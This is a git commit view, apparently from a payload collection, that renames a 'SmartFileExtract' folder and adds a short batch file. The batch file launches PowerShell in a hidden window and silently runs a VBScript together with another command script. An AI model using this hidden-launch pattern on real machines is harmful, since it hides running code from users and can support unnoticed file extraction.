Cleanup: Rename SmartFileExtract folder

This commit is contained in:
Foxtrot
2019-07-05 20:39:51 +01:00
parent faf0c7411e
commit f3cb607e0e
6 changed files with 0 additions and 0 deletions

View File

@@ -0,0 +1,4 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit